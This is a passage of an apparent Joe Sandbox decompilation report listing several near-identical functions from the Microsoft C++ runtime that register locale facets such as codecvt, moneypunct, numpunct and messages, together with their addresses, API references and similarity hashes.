						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043CE33(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645c8 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043d9d7
0x0043d9de
0x0043d9e8
0x0043d9ed
0x0043d9f3
0x0043d9fc
0x0043d9ff
0x0043da04
0x0043da08
0x0043da0d
0x0043da11
0x0043da15
0x0043da1b
0x0043da21
0x0043da22
0x0043da29
0x0043da2c
0x0043da36
0x0043da44
0x0043da44
0x0043da49
0x0043da4e
0x0043da54
0x0043da5a
0x0043da17
0x0043da17
0x0043da17
0x0043da15
0x0043da60
0x0043da67
0x0043da73

APIs

__EH_prolog3.LIBCMT ref: 0043D9DE
std::_Lockit::_Lockit.LIBCPMT ref: 0043D9E8

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

codecvt.LIBCPMT ref: 0043DA22
std::bad_exception::bad_exception.LIBCMT ref: 0043DA36
__CxxThrowException@8.LIBCMT ref: 0043DA44
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043DA5A

Strings

bad cast, xrefs: 0043DA2E
\FF, xrefs: 0043D9F7

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: \FF$bad cast
API String ID: 1676052248-4004987443
Opcode ID: 59a3af0db8878273a761bbeea83c9445f87ff4a59cde4a4477a9a1e8d60c9e7b
Instruction ID: 3791611c1baf891d7670c7ad2cf9dbb4e665f46dd62f07f9a7dfd3d40ea7b0ec
Opcode Fuzzy Hash: 59a3af0db8878273a761bbeea83c9445f87ff4a59cde4a4477a9a1e8d60c9e7b
Instruction Fuzzy Hash: 5401AD71E00219A7CF05FBA1ED42AAE7274AF84324F64012FF5217B2E1DB7C9A05879D

Uniqueness

Uniqueness Score: -1.00%

Function 0043EA75 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043EA75(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645f4; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043E0C3(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645f4 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043ea75
0x0043ea7c
0x0043ea86
0x0043ea8b
0x0043ea91
0x0043ea9a
0x0043ea9d
0x0043eaa2
0x0043eaa6
0x0043eaab
0x0043eaaf
0x0043eab3
0x0043eab9
0x0043eabf
0x0043eac0
0x0043eac7
0x0043eaca
0x0043ead4
0x0043eae2
0x0043eae2
0x0043eae7
0x0043eaec
0x0043eaf2
0x0043eaf8
0x0043eab5
0x0043eab5
0x0043eab5
0x0043eab3
0x0043eafe
0x0043eb05
0x0043eb11

APIs

__EH_prolog3.LIBCMT ref: 0043EA7C
std::_Lockit::_Lockit.LIBCPMT ref: 0043EA86

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

moneypunct.LIBCPMT ref: 0043EAC0
std::bad_exception::bad_exception.LIBCMT ref: 0043EAD4
__CxxThrowException@8.LIBCMT ref: 0043EAE2
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043EAF8

Strings

bad cast, xrefs: 0043EACC
8FF, xrefs: 0043EA95

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: 8FF$bad cast
API String ID: 2090539961-3319993668
Opcode ID: 5a3487cf34f8703ecfdfc71a014c327dcda402c394f25cd7ab5c8b245ae8c443
Instruction ID: fe52d57adf4ab86736fb78efdbe8534d895ce51f090278bf2ddd258fcbbc814c
Opcode Fuzzy Hash: 5a3487cf34f8703ecfdfc71a014c327dcda402c394f25cd7ab5c8b245ae8c443
Instruction Fuzzy Hash: 0D01A131901125ABCF05FBA29D12ABE72356F84724FA4012FF4117B2E2DFBC9905879D

Uniqueness

Uniqueness Score: -1.00%

Function 0043DBAE Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043DBAE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645d4; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043CEBD(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645d4 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043dbae
0x0043dbb5
0x0043dbbf
0x0043dbc4
0x0043dbca
0x0043dbd3
0x0043dbd6
0x0043dbdb
0x0043dbdf
0x0043dbe4
0x0043dbe8
0x0043dbec
0x0043dbf2
0x0043dbf8
0x0043dbf9
0x0043dc00
0x0043dc03
0x0043dc0d
0x0043dc1b
0x0043dc1b
0x0043dc20
0x0043dc25
0x0043dc2b
0x0043dc31
0x0043dbee
0x0043dbee
0x0043dbee
0x0043dbec
0x0043dc37
0x0043dc3e
0x0043dc4a

APIs

__EH_prolog3.LIBCMT ref: 0043DBB5
std::_Lockit::_Lockit.LIBCPMT ref: 0043DBBF

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

codecvt.LIBCPMT ref: 0043DBF9
std::bad_exception::bad_exception.LIBCMT ref: 0043DC0D
__CxxThrowException@8.LIBCMT ref: 0043DC1B
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043DC31

Strings

bad cast, xrefs: 0043DC05
TFF, xrefs: 0043DBCE

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: TFF$bad cast
API String ID: 1676052248-3904582861
Opcode ID: 7e24e0ff73628e795d7a666547b5702d82d13c573cde62537fb11f2cdb7cad4b
Instruction ID: 17b44bd3c71fe1c406c4cfe15812b653974f8ce87952ab5ec593e1279942ba58
Opcode Fuzzy Hash: 7e24e0ff73628e795d7a666547b5702d82d13c573cde62537fb11f2cdb7cad4b
Instruction Fuzzy Hash: 7201A131D0011597CF05EBA19942ABE7234AF84364F64052FF4217B2E1DFBC9904C79D

Uniqueness

Uniqueness Score: -1.00%

Function 0043DC4B Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043DC4B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645d8; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043CF47(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645d8 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043dc4b
0x0043dc52
0x0043dc5c
0x0043dc61
0x0043dc67
0x0043dc70
0x0043dc73
0x0043dc78
0x0043dc7c
0x0043dc81
0x0043dc85
0x0043dc89
0x0043dc8f
0x0043dc95
0x0043dc96
0x0043dc9d
0x0043dca0
0x0043dcaa
0x0043dcb8
0x0043dcb8
0x0043dcbd
0x0043dcc2
0x0043dcc8
0x0043dcce
0x0043dc8b
0x0043dc8b
0x0043dc8b
0x0043dc89
0x0043dcd4
0x0043dcdb
0x0043dce7

APIs

__EH_prolog3.LIBCMT ref: 0043DC52
std::_Lockit::_Lockit.LIBCPMT ref: 0043DC5C

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

codecvt.LIBCPMT ref: 0043DC96
std::bad_exception::bad_exception.LIBCMT ref: 0043DCAA
__CxxThrowException@8.LIBCMT ref: 0043DCB8
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043DCCE

Strings

bad cast, xrefs: 0043DCA2
LFF, xrefs: 0043DC6B

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: LFF$bad cast
API String ID: 1676052248-3803164623
Opcode ID: ab1b875fe732444218f1b37e0c7d4695c4cd02dcb60fe6a70e7cf392abca294f
Instruction ID: 9d71dbfa31364ed64b3065e4d45fd02c8a53bdbee6eecdb8bafd8221690b25fe
Opcode Fuzzy Hash: ab1b875fe732444218f1b37e0c7d4695c4cd02dcb60fe6a70e7cf392abca294f
Instruction Fuzzy Hash: C5018E3190021597CF05EBA19852AAE72356F84324F64112FF5117B2E1DFBC9904D79D

Uniqueness

Uniqueness Score: -1.00%

Function 0043EC4C Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043EC4C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x464600; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043E2D1(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x464600 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043ec4c
0x0043ec53
0x0043ec5d
0x0043ec62
0x0043ec68
0x0043ec71
0x0043ec74
0x0043ec79
0x0043ec7d
0x0043ec82
0x0043ec86
0x0043ec8a
0x0043ec90
0x0043ec96
0x0043ec97
0x0043ec9e
0x0043eca1
0x0043ecab
0x0043ecb9
0x0043ecb9
0x0043ecbe
0x0043ecc3
0x0043ecc9
0x0043eccf
0x0043ec8c
0x0043ec8c
0x0043ec8c
0x0043ec8a
0x0043ecd5
0x0043ecdc
0x0043ece8

APIs

__EH_prolog3.LIBCMT ref: 0043EC53
std::_Lockit::_Lockit.LIBCPMT ref: 0043EC5D

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

moneypunct.LIBCPMT ref: 0043EC97
std::bad_exception::bad_exception.LIBCMT ref: 0043ECAB
__CxxThrowException@8.LIBCMT ref: 0043ECB9
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043ECCF

Strings

bad cast, xrefs: 0043ECA3
PFF, xrefs: 0043EC6C

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: PFF$bad cast
API String ID: 2090539961-3955036082
Opcode ID: 7be9af467ea9b310d0ee4b1849103b8f825bec9140461e7abeeb0a824c43aa63
Instruction ID: 5a1893ee11ef0b8b00bafbd1cb9c451b7affd2ae3a7ba70915d80a74340a03f9
Opcode Fuzzy Hash: 7be9af467ea9b310d0ee4b1849103b8f825bec9140461e7abeeb0a824c43aa63
Instruction Fuzzy Hash: E601A13190111597CF05EFA2D902BAE72356F84724F64052FF4117B2E2DB7C9905879D

Uniqueness

Uniqueness Score: -1.00%

Function 0043ECE9 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043ECE9(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x464604; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043E393(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x464604 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043ece9
0x0043ecf0
0x0043ecfa
0x0043ecff
0x0043ed05
0x0043ed0e
0x0043ed11
0x0043ed16
0x0043ed1a
0x0043ed1f
0x0043ed23
0x0043ed27
0x0043ed2d
0x0043ed33
0x0043ed34
0x0043ed3b
0x0043ed3e
0x0043ed48
0x0043ed56
0x0043ed56
0x0043ed5b
0x0043ed60
0x0043ed66
0x0043ed6c
0x0043ed29
0x0043ed29
0x0043ed29
0x0043ed27
0x0043ed72
0x0043ed79
0x0043ed85

APIs

__EH_prolog3.LIBCMT ref: 0043ECF0
std::_Lockit::_Lockit.LIBCPMT ref: 0043ECFA

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

moneypunct.LIBCPMT ref: 0043ED34
std::bad_exception::bad_exception.LIBCMT ref: 0043ED48
__CxxThrowException@8.LIBCMT ref: 0043ED56
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043ED6C

Strings

bad cast, xrefs: 0043ED40
hFF, xrefs: 0043ED09

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast$hFF
API String ID: 2090539961-3595709463
Opcode ID: 1be3f997b45b67cc76f81827ba249bcdaeb0b6d7200125cbffbb7d2e527fbc98
Instruction ID: 6a69b633d611d55fcb0cd1246a0c732ebdcacba4513b7769a8a7644adc5f0adc
Opcode Fuzzy Hash: 1be3f997b45b67cc76f81827ba249bcdaeb0b6d7200125cbffbb7d2e527fbc98
Instruction Fuzzy Hash: EE01E171A0121597CF04EBA2D912BAE73346F84724F64012FF4107B2E1DB7C9904879D

Uniqueness

Uniqueness Score: -1.00%

Function 0043DCE8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043DCE8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645dc; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043D003(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645dc =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043dce8
0x0043dcef
0x0043dcf9
0x0043dcfe
0x0043dd04
0x0043dd0d
0x0043dd10
0x0043dd15
0x0043dd19
0x0043dd1e
0x0043dd22
0x0043dd26
0x0043dd2c
0x0043dd32
0x0043dd33
0x0043dd3a
0x0043dd3d
0x0043dd47
0x0043dd55
0x0043dd55
0x0043dd5a
0x0043dd5f
0x0043dd65
0x0043dd6b
0x0043dd28
0x0043dd28
0x0043dd28
0x0043dd26
0x0043dd71
0x0043dd78
0x0043dd84

APIs

__EH_prolog3.LIBCMT ref: 0043DCEF
std::_Lockit::_Lockit.LIBCPMT ref: 0043DCF9

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

numpunct.LIBCPMT ref: 0043DD33
std::bad_exception::bad_exception.LIBCMT ref: 0043DD47
__CxxThrowException@8.LIBCMT ref: 0043DD55
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043DD6B

Strings

bad cast, xrefs: 0043DD3F
<FF, xrefs: 0043DD08

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrownumpunctstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: <FF$bad cast
API String ID: 1289509941-3336908347
Opcode ID: a5da73eda7d0e5b9eb297caeae40700594d31a5177f32df21d4a9ba7f3bdc579
Instruction ID: 5171f535fefcf9a5f50b4987d31315dbc28795c5cf771f23aa1ba6cae5c7c5b8
Opcode Fuzzy Hash: a5da73eda7d0e5b9eb297caeae40700594d31a5177f32df21d4a9ba7f3bdc579
Instruction Fuzzy Hash: 7F01A171D00115A7CF05EBA1E812AAE73356F84728F64112FF5117B2E1DF7C99058B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0043DD85 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043DD85(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645e0; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043D08D(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645e0 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043dd85
0x0043dd8c
0x0043dd96
0x0043dd9b
0x0043dda1
0x0043ddaa
0x0043ddad
0x0043ddb2
0x0043ddb6
0x0043ddbb
0x0043ddbf
0x0043ddc3
0x0043ddc9
0x0043ddcf
0x0043ddd0
0x0043ddd7
0x0043ddda
0x0043dde4
0x0043ddf2
0x0043ddf2
0x0043ddf7
0x0043ddfc
0x0043de02
0x0043de08
0x0043ddc5
0x0043ddc5
0x0043ddc5
0x0043ddc3
0x0043de0e
0x0043de15
0x0043de21

APIs

__EH_prolog3.LIBCMT ref: 0043DD8C
std::_Lockit::_Lockit.LIBCPMT ref: 0043DD96

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

messages.LIBCPMT ref: 0043DDD0
std::bad_exception::bad_exception.LIBCMT ref: 0043DDE4
__CxxThrowException@8.LIBCMT ref: 0043DDF2
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043DE08

Strings

bad cast, xrefs: 0043DDDC
,FF, xrefs: 0043DDA5

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

